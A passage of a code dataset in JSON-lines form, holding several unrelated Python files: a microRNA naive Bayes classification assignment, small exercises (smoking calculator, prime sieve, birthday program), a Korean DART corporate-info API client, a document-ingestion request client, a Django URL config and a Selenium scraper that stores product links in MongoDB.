The final value on each line of the file is the class (1 = positive, \n 0 = negative) of that sample. These data represent features extracted from genomic windows that do (positive) and do not (negative) \n correspond to microRNA. Use Weka to do the following:\na) Data visualization:\ni. Load the data (note that there is no header line and that the ‘last’ attribute should be considered as the nominal class).\n Suggest you use the pandas library for this.\nii. Plot the distribution of feature 15 for the two classes on a single histogram. The seaborn library may be useful here.\niii. Plot a scatterplot illustrating the correlation between features 3 and 8, colouring the data by class. Again,\n the seaborn library is useful here.\nb) Preprocessing: sklearn implements several filter type (i.e. not wrapper type) feature selection methods.\ni. Describe the SelectKBest approach using the chi metric. (~50 words, don’t just copy)\nii. Run a different filter-type feature selection approach on your data (i.e. other than SelectKBest with chi).\niii.\n i. Briefly describe which and what parameters you used.\n ii. Summarize the results: how many features were selected and which features selected? If your method simply returns \n a ranked list of all 215 features, choose a subset by applying an arbitrary cutoff score to the ranked list. Describe \n your approach.\nc) Classification: using a naïve Bayes classifier:\ni. Which parameters must be set by the user (briefly describe their meaning)\nii. When creating a hold-out test set, what is stratified sampling and how is it applicable here? (~20 words)\niii. For the original feature set (215 features): Conduct a 5-fold cross-validation test. Provide \nthe confusion matrix, the accuracy, the precision, the sensitivity, and the specificity. \nGenerate a ROC curve and a precision-recall curve.\niv. Repeat iii using your optimal feature set from b-iii) above.\nv. Which feature set led to the best performance? 
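Part b-i of the brief asks for a description of SelectKBest with the chi-squared metric; the code below answers it only in prose and then switches to SelectPercentile with f_classif, which it describes as "using chi2", although f_classif actually computes the ANOVA F-value. A minimal hedged sketch of the SelectKBest/chi2 variant for comparison (k=150 is an arbitrary illustrative cutoff, and chi2 requires non-negative feature values, so it may not apply to this data without shifting or scaling):

from sklearn.feature_selection import SelectKBest, chi2

# Score each feature against the class labels and keep the k highest scorers.
selector = SelectKBest(chi2, k=150)
X_selected = selector.fit_transform(X, Y)           # X, Y as loaded below
kept_indices = selector.get_support(indices=True)   # which columns survived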
(discuss difference in observed performance metrics; ~50 words)\n\"\"\"\nimport sklearn as sk\nimport pandas as pa\nimport seaborn as se\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.feature_selection import SelectPercentile, f_classif\nfrom sklearn.model_selection import StratifiedShuffleSplit\nfrom sklearn.naive_bayes import GaussianNB\nfrom train import get_train\nfrom get_accuracy import get_accuracy\n\n# Load the data (note that there is no header line and that the ‘last’ attribute should be considered as the nominal class).\n\nnames = []\nfor i in range(1,216):\n name = \"feature\" + str(i)\n names.append(name)\nnames.append('classes')\ndata = pa.read_csv('assigData4.csv',names = names)\n\n# Plot the distribution of feature 15 for the two classes on a single histogram.\n\nfeature15class0 = []\nfor j in range(0,7200):\n if data.classes[j] == 0:\n feature15class0.append(data.feature15[j])\nse.distplot(feature15class0, bins = 50, kde = False, label = \"class=0\")\nplt.legend()\nfeature15class1 = []\nfor k in range(0, 7200):\n if data.classes[k] == 1:\n feature15class1.append(data.feature15[k])\nse.distplot(feature15class1, color = 'red', bins = 50, kde = False, label = \"class=1\")\nplt.legend()\n\n# Plot a scatterplot illustrating the correlation between features 3 and 8, colouring the data by class\n\nplt.figure()\nse.scatterplot(x = \"feature3\", y = \"feature8\", data = data,hue='classes')\n\n#I use the SelectPercentile with f_classif method, which use chi2 , and then choose the features of\n#the highest percentile of the scores. the parameter : score_func=, percentile\n\nY = pa.Series(data.classes).values\ndataupdate = data.drop(columns = 'classes')\nX = dataupdate.values\nX_new = SelectPercentile(f_classif, percentile = 70)\nX_new.fit_transform(X,Y)\nselectedfeatureindices = X_new.get_support(indices = True)\na=[]\nfor l in list(range(len(selectedfeatureindices))):\n b = (\"feature\" + str(selectedfeatureindices[l] + 1))\n a.append(b)\nprint(a)\n\"\"\"I select 150 features, 'feature1', 'feature2', 'feature3', 'feature4', 'feature5',\n'feature6', 'feature7', 'feature8', 'feature9', 'feature10', 'feature11', 'feature12',\n'feature13', 'feature14', 'feature15', 'feature16', 'feature17', 'feature18', 'feature19',\n'feature20', 'feature21', 'feature22', 'feature23', 'feature24', 'feature25', 'feature26',\n'feature27', 'feature28', 'feature31', 'feature32', 'feature33', 'feature34', 'feature35',\n'feature36', 'feature37', 'feature38', 'feature39','feature40', 'feature41', 'feature42',\n'feature43', 'feature44', 'feature45', 'feature47', 'feature49', 'feature54', 'feature55',\n'feature56', 'feature59', 'feature60', 'feature61', 'feature65', 'feature66', 'feature67',\n'feature68', 'feature69', 'feature70', 'feature71', 'feature72', 'feature73', 'feature74',\n'feature75', 'feature76', 'feature77', 'feature78', 'feature79', 'feature80', 'feature84',\n'feature85', 'feature89', 'feature90', 'feature91', 'feature93', 'feature95', 'feature96',\n'feature97', 'feature98', 'feature99', 'feature100', 'feature103', 'feature104', 'feature105',\n'feature106', 'feature108', 'feature109', 'feature110', 'feature112', 'feature116', 'feature119',\n'feature120', 'feature121', 'feature122', 'feature123', 'feature124', 'feature126', 'feature129',\n'feature132', 'feature136', 'feature137', 'feature138', 'feature139', 'feature140', 'feature142',\n'feature143', 'feature145', 'feature146', 'feature147', 'feature148', 'feature149', 'feature150',\n'feature151', 'feature154', 'feature155', 
'feature156', 'feature157', 'feature159', 'feature161',\n'feature162', 'feature163', 'feature164', 'feature165', 'feature167', 'feature169', 'feature170',\n'feature171', 'feature172', 'feature173', 'feature174', 'feature175', 'feature178', 'feature179',\n'feature180', 'feature182', 'feature184', 'feature185', 'feature194', 'feature196', 'feature197',\n'feature200', 'feature201', 'feature202', 'feature203', 'feature204', 'feature209', 'feature210',\n'feature211', 'feature212', 'feature213', 'feature214', 'feature215'.\"\"\"\n\n# For the original feature set (215 features): Conduct a 5-fold cross-validation test. Provide \n# the confusion matrix, the accuracy, the precision, the sensitivity, and the specificity. \n# Generate a ROC curve and a precision-recall curve.\n\ndataarray = dataupdate.values\nclassarray = data.classes.values\nc = sk.model_selection.StratifiedShuffleSplit(n_splits = 1, test_size = 0.2)\nfor train_index, test_index in c.split(dataarray, classarray):\n print(\"TRAIN:\", train_index, \"TEST:\", test_index)\nX_train, X_test = dataarray[train_index], dataarray[test_index]\ny_train, y_test = classarray[train_index], classarray[test_index]\ngnb = GaussianNB()\ngnb.fit(X_train, y_train)\nscore = gnb.predict_proba(X_train)[:, 1]\ny_pred = sk.model_selection.cross_val_predict(gnb,X_train, y_train, groups = None, cv = 5, verbose = 2)\nconfusionmatrix = sk.metrics.confusion_matrix(y_train, y_pred)\nTP = confusionmatrix[1,1]\nFP = confusionmatrix[0,1]\nFN = confusionmatrix[1,0]\nTN = confusionmatrix[0,0]\nprint(\"confusion matrix is \",([TP,FP],[FN,TN]))\ntrainaccuracy, trainprecision, trainsensitivity, trainspecificity = get_train(TP, FP, TN, FN)\nprint(\"the accuracy is\", trainaccuracy)\nprint(\"the precision is\", trainprecision)\nprint(\"the sensitivity is\", trainsensitivity)\nprint(\"the trainspecificity is\", trainspecificity)\nfpr, tpr, thresholds = sk.metrics.roc_curve(y_train, score)\nplt.figure()\nplt.scatter(fpr,tpr)\nplt.xlim(0,1)\nplt.ylim(0,1)\nplt.xlabel(\"trainFPR\")\nplt.ylabel(\"trainTPR\")\nplt.show()\ny_score = gnb.predict_proba(X_train)\nprecision, recall, threshold = sk.metrics.precision_recall_curve(y_train,y_score[:,1])\nplt.figure()\nplt.plot(recall, precision)\nplt.xlim(0,1)\nplt.ylim(0,1)\nplt.xlabel('trainrecall')\nplt.ylabel('trainprecision')\nplt.show()\n\n#For the optimal feature set : Conduct a 5-fold cross-validation test. Provide \n#the confusion matrix, the accuracy, the precision, the sensitivity, and the specificity. 
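get_train is imported from a local train module that is not included here. A plausible, hedged reconstruction consistent with how it is called in this file (four confusion-matrix counts in, four metrics out, in the order the prints expect):

def get_train(TP, FP, TN, FN):
    # Standard derived metrics, guarded against empty denominators.
    accuracy    = (TP + TN) / (TP + TN + FP + FN)
    precision   = TP / (TP + FP) if (TP + FP) else 0.0
    sensitivity = TP / (TP + FN) if (TP + FN) else 0.0   # recall / true positive rate
    specificity = TN / (TN + FP) if (TN + FP) else 0.0   # true negative rate
    return accuracy, precision, sensitivity, specificity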
\n#Generate a ROC curve and a precision-recall curve.\n\ndataarraynew=data[a].values\nclassarraynew=data.classes.values\ns = sk.model_selection.StratifiedShuffleSplit(n_splits=1, test_size=0.2)\nfor train_indexnew, test_indexnew in s.split(dataarraynew, classarraynew):\n print(\"TRAIN:\", train_indexnew, \"TEST:\", test_indexnew)\nX_trainnew, X_testnew = dataarraynew[train_indexnew], dataarraynew[test_indexnew]\ny_trainnew, y_testnew = classarraynew[train_indexnew], classarraynew[test_indexnew]\ngnbnew = GaussianNB()\ngnbnew.fit(X_trainnew,y_trainnew)\nscorenew = gnbnew.predict_proba(X_trainnew)[:, 1]\ny_prednew = sk.model_selection.cross_val_predict(gnbnew,X_trainnew, y_trainnew, groups=None, cv=5, verbose=2)\nconfusionmatrixnew = sk.metrics.confusion_matrix(y_trainnew, y_prednew)\nTPnew = confusionmatrixnew[1,1]\nFPnew = confusionmatrixnew[0,1]\nFNnew = confusionmatrixnew[1,0]\nTNnew = confusionmatrixnew[0,0]\nprint(\"confusion matrix is \",([TPnew,FPnew],[FNnew,TNnew]))\ntrainaccuracynew,trainprecisionew, trainsensitivitynew, trainspecificitynew = get_train(TPnew, FPnew, TNnew, FNnew)\nprint(\"the accuracy is\",trainaccuracynew)\nprint(\"the precision is\",trainprecisionew)\nprint(\"the sensitivity is\",trainsensitivitynew)\nprint(\"the trainspecificity is\",trainspecificitynew)\nfprnew, tprnew, thresholdsnew = sk.metrics.roc_curve(y_trainnew, scorenew)\nplt.figure()\nplt.scatter(fprnew,tprnew)\nplt.xlim(0,1)\nplt.ylim(0,1)\nplt.xlabel(\"trainFPRnew\")\nplt.ylabel(\"trainTPRnew\")\nplt.show()\ny_scorenew = gnbnew.predict_proba(X_trainnew)\nprecisionnew, recallnew, thresholdnew = sk.metrics.precision_recall_curve(y_trainnew, y_scorenew[:,1])\nplt.figure()\nplt.plot(recallnew, precisionnew)\nplt.xlim(0,1)\nplt.ylim(0,1)\nplt.xlabel('trainrecallnew')\nplt.ylabel('trainprecisionnew')\nplt.show()\n\n# get the accuracy of different dataset\nytrainaccuracy = get_accuracy(gnb, X_train, y_train)\nprint(\"the accuracy on the train set of the original data is\",ytrainaccuracy)\nytrainnewaccuracy = get_accuracy(gnbnew, X_trainnew, y_trainnew)\nprint(\"the accuracy on the train set of the selecting data is\",ytrainnewaccuracy)\nytestaccuracy = get_accuracy(gnb, X_test, y_test)\nprint(\"the accuracy on the test set of the original data is\",ytestaccuracy)\nytestnewaccuracy = get_accuracy(gnbnew, X_testnew, y_testnew)\nprint(\"the accuracy on the test set of the selecting data is\",ytestnewaccuracy)\n","sub_path":"assignment4.py","file_name":"assignment4.py","file_ext":"py","file_size_in_byte":10651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"165492633","text":"macos= int(input(\"Quantos cigarros por dia? \"))\n\ntempo= int(input(\"Quantos anos fuma? 
\"))\n\n#1 cigarro 10min de vida #1 dia= 24*60 min\n\ndef perdido (macos,tempo):\n m=macos*10*365*tempo #minutos perdidos nos anos de fumo\n dia= m/(24*60)\n return dia\n\nvida= perdido(macos,tempo)\n\nprint(\"Tempo perdido: {0} dias\".format(vida))","sub_path":"backup/user_314/ch22_2020_09_02_19_56_54_169012.py","file_name":"ch22_2020_09_02_19_56_54_169012.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"378001094","text":"import requests\nfrom bs4 import BeautifulSoup\n\n# 종목코드를 고유변호로 변환 (함수 정의)\ndef get_code(stock_code): \n # 고유번호 리스트 파일 불러오기 \n XML_PATH = \"./data/CORPCODE.xml\"\n infile = open(XML_PATH,\"r\", encoding='utf-8')\n code_xml = infile.read()\n soup_xml = BeautifulSoup(code_xml,'html.parser')\n\n # 종목코드를 찾고, 고유번호를 추출\n items = soup_xml.find_all('list') \n for item in items:\n scode = item.find('stock_code').text\n if str(scode)==str(stock_code):\n corp_code = item.find('corp_code').text\n print('고유번호: %s' % corp_code)\n return corp_code\n \n print('Failed to get the proper code...') \n return None\n\n# Open DART 접속\nif __name__==\"__main__\":\n\n # DART 전자공시 사이트 APT 인증키 입력\n my_auth_key = \"---발급받은 개인 키를 입력하세요---\" \n \n # 기업개황 정보 접속 URL\n crp_cd = get_code(\"005380\")\n url = \"https://opendart.fss.or.kr/api/company.xml?crtfc_key=\"+my_auth_key+\"&corp_code=\"+crp_cd\n\n # BeautifulSoup으로 API가 반환하는 XML 해석하여 dataframe으로 정리\n xml = requests.get(url)\n soup = BeautifulSoup(xml.text, 'html.parser') \n\n corp_name = soup.find('corp_name').text\n corp_name_eng = soup.find('corp_name_eng').text\n stock_name = soup.find('stock_name').text\n stock_code = soup.find('stock_code').text\n ceo_nm = soup.find('ceo_nm').text\n corp_cls = soup.find('corp_cls').text\n jurir_no = soup.find('jurir_no').text\n bizr_no = soup.find('bizr_no').text\n adres = soup.find('adres').text\n hm_url = soup.find('hm_url').text\n ir_url = soup.find('ir_url').text\n phn_no = soup.find('phn_no').text\n fax_no = soup.find('fax_no').text\n induty_code = soup.find('induty_code').text\n est_dt = soup.find('est_dt').text\n acc_mt = soup.find('acc_mt').text\n \n company_info = {'corp_name':corp_name,\n 'corp_name_eng':corp_name_eng,\n 'stock_name':stock_name,\n 'stock_code':stock_code,\n 'ceo_nm':ceo_nm,\n 'corp_cls':corp_cls,\n 'jurir_no':jurir_no,\n 'bizr_no':bizr_no,\n 'adres':adres,\n 'hm_url':hm_url,\n 'ir_url':ir_url,\n 'phn_no':phn_no,\n 'fax_no':fax_no,\n 'induty_code':induty_code,\n 'est_dt':est_dt,\n 'acc_mt':acc_mt, \n }\n\nprint(company_info)","sub_path":"5674-849/044.py","file_name":"044.py","file_ext":"py","file_size_in_byte":2647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"94525764","text":"import time\nimport requests\nimport json\nimport os\nimport logging\n\nfrom xpmsrequests.data import DataVariables\nfrom xpmsrequests.rangerrequests import requestsrangerbase\n\nclass RangerReq(requestsrangerbase.RangerBase):\n TempDocID = ''\n def __init__(self):\n # Create the Logger\n super(RangerReq,self).__init__()\n self.logger = logging.getLogger(__name__)\n # *****************************************************************************************************\n # *****************************************************************************************************\n\n def getDataByJobId(self,JobId):\n self.logger.info('Into getDataByJobId method')\n jobIdUrl = DataVariables.RangerJobIdUrl+JobId\n self.logger.info('JobIdUrl is :'+jobIdUrl)\n status 
= 'in-progress'\n processStatus = 'process_status'\n\n try:\n count = 1\n while (count <= DataVariables.TimeOut):\n tempJson = requests.get(jobIdUrl).json()\n if(count > DataVariables.TimeOut):\n self.logger.error('Time Count Exceeded')\n return None\n if (tempJson[processStatus] != status):\n print('Exited while')\n self.logger.info('Returning Json :'+str(tempJson))\n return tempJson\n if (tempJson[processStatus] == status):\n self.logger.info('Into Sleep')\n self.logger.info('Sleep Time is : '+str(DataVariables.PollTime))\n time.sleep(DataVariables.PollTime)\n count += 1\n self.logger.info('count is :'+str(count))\n except:\n print('Unable to generate response')\n self.logger.error('Unable to generate response')\n\n\n # *****************************************************************************************************\n # *****************************************************************************************************\n\n def upLoadReq(self, imgUrl):\n\n self.logger.info('Into upLoadReq method')\n files = {'file': open(imgUrl, 'rb')}\n # self.logger.info('file is:'+str(files))\n response = requests.post(DataVariables.RangerUploadURL, files=files)\n self.logger.info('Response Json after uploading image is' + str(response.json()))\n if (response.status_code == 200):\n self.logger.info(\n 'Status of Response returned after uploading the image is ' + str(response.status_code))\n return response.json()\n else:\n self.logger.error(\n 'Status of Response returned after uploading the image is' + str(response.status_code))\n return None\n\n # *****************************************************************************************************\n\n def insightIngest(self, uploadjson):\n self.logger.info('Into Insight Ingest method')\n jsonFileData = self.getJsonFileData(DataVariables.Insightingestjson)\n self.logger.info('The body Of insight Ingest Json Is :' + str(jsonFileData))\n jsonFileData['data']['file_path'][0] = uploadjson['metadata']['file_path']\n jsonFileData['data']['request_type'] = 'ingest_document'\n jsonFileData['entity_id'] = DataVariables.entityId\n jsonFileData['solution_id'] = DataVariables.solutionId\n\n self.logger.info(\n 'Insight Ingest json after assigning metadata of Upload json and RequestType,EntityID and Solution Is is :' + str(\n jsonFileData))\n\n ingestFileJobID = self.getResponse(DataVariables.GetInsightURL, jsonFileData)\n self.logger.info('Job Id returned by insightIngest is :' + str(ingestFileJobID))\n return ingestFileJobID\n\n # *****************************************************************************************************\n\n def insightExtractDocumentMetadata(self,injestInsightJson):\n self.logger.info('Into insightExtractDocumentMetadata method')\n jsonFileData = self.getJsonFileData(DataVariables.GetInsightJson)\n self.logger.info('The body Of Getinsight Json Is :' + str(jsonFileData))\n #import pdb;pdb.set_trace()\n jsonFileData['data']['doc_id'] = injestInsightJson['result']['metadata']['insights'][0]['insight']['doc_id']\n RangerReq.TempDocID = jsonFileData['data']['doc_id']\n print('$$$$$$$$$$$$$$The Doc Id Is $$$$$$$$$$$$$$$$$$',jsonFileData['data']['doc_id'])\n self.logger.info('$$$$$$$$$$$$$$The Doc Id Is $$$$$$$$$$$$$$$$$$'+ str(jsonFileData['data']['doc_id']))\n jsonFileData['data']['request_type'] = 'extract_document_metadata'\n jsonFileData['entity_id'] = DataVariables.entityId\n jsonFileData['solution_id'] = DataVariables.solutionId\n\n self.logger.info(\n 'Insight json after assigning metadata of InsightIngest json and 
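getDataByJobId above folds the timeout test into the loop body, and the `count > TimeOut` check inside `while count <= TimeOut` can never fire. A hedged generic helper with the same poll-sleep-retry shape (poll_until is an illustrative name):

import time

def poll_until(fetch, done, poll_seconds, max_polls):
    # Call fetch() up to max_polls times, sleeping between attempts,
    # until done(result) is true. Returns None on timeout.
    for _ in range(max_polls):
        result = fetch()
        if done(result):
            return result
        time.sleep(poll_seconds)
    return None

# e.g. poll_until(lambda: requests.get(job_url).json(),
#                 lambda j: j['process_status'] != 'in-progress',
#                 DataVariables.PollTime, DataVariables.TimeOut)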
RequestType,EntityID and Solution Is is :' + str(\n jsonFileData))\n\n insightExtractDocumentMetadataJobID = self.getResponse(DataVariables.GetInsightURL, jsonFileData)\n self.logger.info('Job Id returned by insightExtractDocumentMetadata is :' + str(insightExtractDocumentMetadataJobID))\n return insightExtractDocumentMetadataJobID\n\n # *****************************************************************************************************\n\n def insightConvertDocument(self,insightExtractDocumentMetadataJson):\n self.logger.info('Into insightConvertDocument method')\n jsonFileData = self.getJsonFileData(DataVariables.GetInsightJson)\n self.logger.info('The body Of jsonFileData Json Is :' + str(jsonFileData))\n #import pdb;pdb.set_trace()\n jsonFileData['data']['doc_id'] = insightExtractDocumentMetadataJson['result']['metadata']['insights'][0]['request']['data']['doc_id']\n jsonFileData['data']['doc_id'] = RangerReq.TempDocID\n jsonFileData['data']['request_type'] = 'convert_document'\n jsonFileData['entity_id'] = DataVariables.entityId\n jsonFileData['solution_id'] = DataVariables.solutionId\n\n self.logger.info(\n 'Insight json after assigning metadata of ExtractDocumentMetadata json and RequestType,EntityID and Solution Is is :' + str(\n jsonFileData))\n\n insightConvertDocumentJobID = self.getResponse(DataVariables.GetInsightURL, jsonFileData)\n self.logger.info('Job Id returned by ConvertDocumentJobID is :' + str(insightConvertDocumentJobID))\n return insightConvertDocumentJobID\n\n # *****************************************************************************************************\n\n def insightClassifyDocument(self,insightConvertDocumentJson):\n self.logger.info('Into insightClassifyDocument method')\n jsonFileData = self.getJsonFileData(DataVariables.GetInsightJson)\n self.logger.info('The body Of jsonFileData Json Is :' + str(jsonFileData))\n #import pdb;pdb.set_trace()\n #jsonFileData['data']['doc_id'] = insightConvertDocumentJson['result']['metadata']['insights'][0]['request']['data']['doc_id']\n jsonFileData['data']['doc_id'] = RangerReq.TempDocID\n jsonFileData['data']['request_type'] = 'classify_document'\n jsonFileData['entity_id'] = DataVariables.entityId\n jsonFileData['solution_id'] = DataVariables.solutionId\n\n self.logger.info(\n 'Insight json after assigning metadata of ConvertDocument json and RequestType,EntityID and Solution Is is :' + str(\n jsonFileData))\n\n insightClassifyDocumentJobID = self.getResponse(DataVariables.GetInsightURL, jsonFileData)\n self.logger.info('Job Id returned by ClassifyDocumentJobID is :' + str(insightClassifyDocumentJobID))\n return insightClassifyDocumentJobID\n\n # *****************************************************************************************************\n\n def insightExtractDocumentElements(self,insightClassifyDocumentJson):\n self.logger.info('Into insightExtractDocumentElements method')\n jsonFileData = self.getJsonFileData(DataVariables.GetInsightJson)\n self.logger.info('The body Of jsonFileData Json Is :' + str(jsonFileData))\n #import pdb;pdb.set_trace()\n #jsonFileData['data']['doc_id'] = insightClassifyDocumentJson['result']['metadata']['insights'][0]['request']['data']['doc_id']\n jsonFileData['data']['doc_id'] = RangerReq.TempDocID\n jsonFileData['data']['request_type'] = 'extract_document_elements'\n jsonFileData['entity_id'] = DataVariables.entityId\n jsonFileData['solution_id'] = DataVariables.solutionId\n\n self.logger.info(\n 'Insight json after assigning metadata of ClassifyDocument json and 
RequestType,EntityID and Solution Is is :' + str(\n jsonFileData))\n\n insightExtractDocumentElementsJobID = self.getResponse(DataVariables.GetInsightURL, jsonFileData)\n self.logger.info('Job Id returned by ExtractDocumentElementsJobID is :' + str(insightExtractDocumentElementsJobID))\n return insightExtractDocumentElementsJobID\n\n # *****************************************************************************************************\n def insightExtractDocumentText(self,insightExtractDocumentElementsJson):\n self.logger.info('Into insightExtractDocumentText method')\n jsonFileData = self.getJsonFileData(DataVariables.GetInsightJson)\n self.logger.info('The body Of jsonFileData Json Is :' + str(jsonFileData))\n #import pdb;pdb.set_trace()\n #jsonFileData['data']['doc_id'] = insightExtractDocumentElementsJson['result']['metadata']['insights'][0]['request']['data']['doc_id']\n jsonFileData['data']['doc_id'] = RangerReq.TempDocID\n jsonFileData['data']['request_type'] = 'extract_document_text'\n jsonFileData['entity_id'] = DataVariables.entityId\n jsonFileData['solution_id'] = DataVariables.solutionId\n\n self.logger.info(\n 'Insight json after assigning metadata of ExtractDocumentElements json and RequestType,EntityID and Solution Is is :' + str(\n jsonFileData))\n\n insightExtractDocumentTextJobID = self.getResponse(DataVariables.GetInsightURL, jsonFileData)\n self.logger.info('Job Id returned by ExtractDocumentElementsJobID is :' + str(insightExtractDocumentTextJobID))\n return insightExtractDocumentTextJobID\n\n","sub_path":"xpmsrequests/rangerrequests/requestsranger.py","file_name":"requestsranger.py","file_ext":"py","file_size_in_byte":10447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"396585292","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/webmpris/urls.py\n# Compiled at: 2013-11-14 22:46:20\nfrom django.conf.urls import patterns, url\nfrom webmpris.views import Root, Player, TrackList, Playlists\nOBJ_MAP = {'Root': Root, 'Player': Player, \n 'TrackList': TrackList, \n 'Playlists': Playlists}\nurlpatterns = patterns('webmpris.views', url('^players$', 'get_players', name='players'))\nfor name, obj in OBJ_MAP.items():\n url_prop = ('^players/(?P:[\\\\w.]+)/{name}$').format(name=name)\n url_meth = url_prop[:-1] + '/(?P[\\\\w]+$)'\n urlpatterns += patterns('', url(url_prop, obj.as_view()), url(url_meth, obj.as_view()))","sub_path":"pycfiles/webmpris-1.1-py2.7/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"574126520","text":"# return a list ret that contains all prime numbers <= N\ndef sieve_algorithm(N):\n myList = [True] * (N+1);\n\n for i in range(2,N+1):\n if myList[i]==True:\n j=2;\n while j*i<=N:\n myList[j*i] = False\n j+=1\n\n ret = []\n for i in range(2,N+1):\n if(myList[i]):\n ret.append(i)\n\n return ret\n\nprint(sieve_algorithm(11))\n","sub_path":"sieve.py","file_name":"sieve.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"260000945","text":"\"\"\"\nbirthday.py\nAuthor: Esther Hacker\nCredit: N/A\nAssignment: Birthday Problem\n\nYour program will ask the user the following questions, in this order:\n\n1. Their name.\n2. 
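The sieve above marks composites with an inner while loop and scans every i up to N. A hedged slice-based variant that produces the same list while only iterating i up to the square root of N:

def sieve(n):
    # Sieve of Eratosthenes with slice assignment; starting each sweep at
    # i*i is safe because smaller multiples were marked by smaller primes.
    is_prime = [True] * (n + 1)
    is_prime[:2] = [False, False]
    for i in range(2, int(n ** 0.5) + 1):
        if is_prime[i]:
            is_prime[i * i::i] = [False] * len(is_prime[i * i::i])
    return [i for i, p in enumerate(is_prime) if p]

assert sieve(11) == [2, 3, 5, 7, 11]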
The name of the month they were born in (e.g. \"September\").\n3. The year they were born in (e.g. \"1962\").\n4. The day they were born on (e.g. \"11\").\n\nIf the user's birthday fell on October 31, then respond with:\n\n    You were born on Halloween!\n\nIf the user's birthday fell on today's date, then respond with:\n\n    Happy birthday!\n\nOtherwise respond with a statement like this:\n\n    Peter, you are a winter baby of the nineties.\n\nExample Session\n\n    Hello, what is your name? Eric\n    Hi Eric, what was the name of the month you were born in? September\n    And what year were you born in, Eric? 1972\n    And the day? 11\n    Eric, you are a fall baby of the stone age.\n\"\"\"\nfrom datetime import datetime\nfrom calendar import month_name\ntodaymonth = datetime.today().month\ntodaydate = int(datetime.today().day)\ntodayyear = int(datetime.today().year)\n\ntodaymonthname = month_name[todaymonth].lower()\n\nname = input(\"Hello, what is your name? \")\nmonth = input(\"Hi \" + name + \", what is the name of the month you were born in? \")\nmonth = month.lower()\n# ask for year before day, matching the documented question order above\nyear = int(input(\"And what year were you born in, \" + name + \"? \"))\nday = int(input(\"And the day? \"))\n\nif month == \"october\" and day == 31:\n    print(\"You were born on Halloween!\")\n    \nelse:\n    if month == todaymonthname and day == todaydate:\n        print(\"Happy birthday!\")\n\n    else:\n        if month == \"december\" or month == \"january\" or month == \"february\":\n            season = \"winter\"\n        \n        if month == \"march\" or month == \"april\" or month == \"may\":\n            season = \"spring\"\n        \n        if month == \"june\" or month == \"july\" or month == \"august\":\n            season = \"summer\"\n        \n        if month == \"september\" or month == \"october\" or month == \"november\":\n            season = \"fall\"\n        \n        if year in range(1980, 1990):\n            decade = \"eighties\"\n        \n        if year in range(1990, 2000):\n            decade = \"nineties\"\n        \n        if year in range(2000, todayyear + 1):\n            decade = \"two thousands\"\n        \n        if year not in range(1980, todayyear + 1):\n            decade = \"stone age\"\n        \n        print(name + \", you are a \" + season + \" baby of the \" + decade + \".\")\n","sub_path":"birthday.py","file_name":"birthday.py","file_ext":"py","file_size_in_byte":2371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"206420513","text":"import logging\nimport time\nfrom selenium.webdriver import ActionChains\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom selenium import webdriver\nfrom lxml import etree\nimport pymongo\n\nclass Selenium():\n    def __init__(self, timeout=None):\n        self.logger = logging.getLogger(__name__)\n        self.timeout = 20\n        self.browser = webdriver.Chrome()\n        # self.browser.set_window_size(1400, 700)\n        self.browser.set_page_load_timeout(self.timeout)\n        self.wait = WebDriverWait(self.browser, self.timeout)\n        self.client = pymongo.MongoClient('localhost')\n        self.db = self.client['new_hc']\n\n    def __del__(self):\n        self.browser.close()\n\n    def process(self,url,tag):\n        self.logger.debug('Chrome is Starting')\n        try:\n            self.browser.get(url)\n            time.sleep(0.5)\n            # ActionChains(self.browser).send_keys(Keys.DOWN).perform()\n            # scroll down in stages so lazily loaded items have time to render;\n            # fall back to a second step sequence if the first one fails\n            try:\n                self._scroll_by_steps([(500, 0.5), (1200, 0.5), (1800, 0.5), (2500, 1), (3200, 1), (3700, 1)])\n            except:\n                self._scroll_by_steps([(500, 0.5), (1000, 0.5), (1500, 0.5), (2300, 0.5), (3500, 0.5), (4000, 0)])\n            self.parse_detail(self.browser.page_source,tag)\n        except TimeoutException:\n            ActionChains(self.browser).send_keys(Keys.F5).perform()\n            time.sleep(1)\n            return self.process(url,tag)\n        return self.browser\n\n    def _scroll_by_steps(self, steps):\n        # each step is (scrollTop offset, pause in seconds); 0 means no pause\n        for top, pause in steps:\n            self.browser.execute_script(\"var q=document.documentElement.scrollTop=%d\" % top)\n            if pause:\n                time.sleep(pause)\n\n    def parse_detail(self, response,tag):\n        # print(response.url)\n        # item = response.meta['item']\n        doc = etree.HTML(response)\n        urls = doc.xpath(\"//div[@class='picmid pRel']\")\n        print(len(urls))\n        for url in urls:\n            sub_url = url.xpath(\"./a/@href\")[0]\n            # print(sub_url)\n            if 'http' in sub_url:\n                continue\n            sub_url = 'https:' + sub_url\n            item = {'link':sub_url,'tag': tag}\n            if self.db['link'].update({'link':sub_url},{'$set': item},True):\n                print('Saved to mongo', tag, sub_url)\n            else:\n                print('No Mongo')\n        # # yield item\n        # yield scrapy.Request(sub_url, callback=self.parse_sh, dont_filter=True)\n        # the xpath below matches the link whose title is '下一页' (next page)\n        page = doc.xpath(\"//span[@class='page_next page-n']/a[@title='下一页']/@href\")\n        if page:\n            next_page = 'https:' + page[0]\n            print('Current page', next_page, '-------------')\n            return self.process(next_page,tag)\n        # yield scrapy.Request(next_page,callback=self.parse_detail,dont_filter=True)\n        else:\n            print(\"No more pages\")\n            pass\n\n    def run(self):\n        # print(self.db.get_collection('hc').find({}).count())\n        for url in self.db.get_collection('link').find({}):\n            print(url)\n            self.process(url['big_link'],url['tag'])\n        # 